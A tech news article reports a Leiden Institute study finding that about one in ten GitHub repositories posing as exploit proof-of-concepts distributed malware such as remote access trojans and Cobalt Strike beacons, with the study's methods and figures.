Thousands of GitHub repositories are littered with malware

Instead of a GitHub PoC, you get malware

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

More than one in every ten GitHub repositories sharing exploit proof-of-concepts could be holding some form ofmalwareor malicious content, putting software developers and cybersecurity researchers at plenty of risk, experts have found.

GitHub is used, among other things, to share proof-of-concept (PoC) exploits for various vulnerabilities. That helps researchers and developers verify existing fixes and make sure their products andendpointsare safe from risky flaws.

A report from researchers at the Leiden Institute of Advanced Computer Science analyzing tens of thousands of such repositories found many were distributing fake PoCs which were, instead, holding malware.

Trojans and Cobalt Strike beacons

During the experiment, researchers analyzed roughly 47,300 repositories claiming to be a PoC for a flaw discovered between 2017 and 2021.

They cross-referenced PoC publisher IPs to public blocklists, VT and AbuseIPDB, ran VirusTotal checks on the provided executables and their hashes, and decoded obfuscated files before running binary and IP checks.

GitHub accounts are being stolen by fake CircleCI accounts>GitHub is getting better at hunting down your dangerous code>Here are the best antivirus programs right now

What they found was a total of 4,893 repositories being malicious in one way or another. Of the 150,734 unique IP addresses that were extracted, 2,864 were found on blocklists, 1,522 were previously flagged by VirusTotal, and 1,069 were found in AbuseIPDB’s database. Analyzing the binaries on 6,160 executables, researchers found 2,164 malicious samples, hosted in 1,398 repositories.

All in all, the possibility of picking up malware instead of an actual PoC is around 10.3%, researchers concluded. Victims can be infected by a myriad of things, from remote access trojans to Cobalt Strike beacons.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

After seeing the results, GitHub moved to remove the malicious content from its platform, butBleepingComputerfound at least 60 examples are still pending removal.

Via:BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

This new phishing strategy utilizes GitHub comments to distribute malware

Should your VPN always be on?

The M4 Mac mini has removable, modular storage – and an important SSD upgrade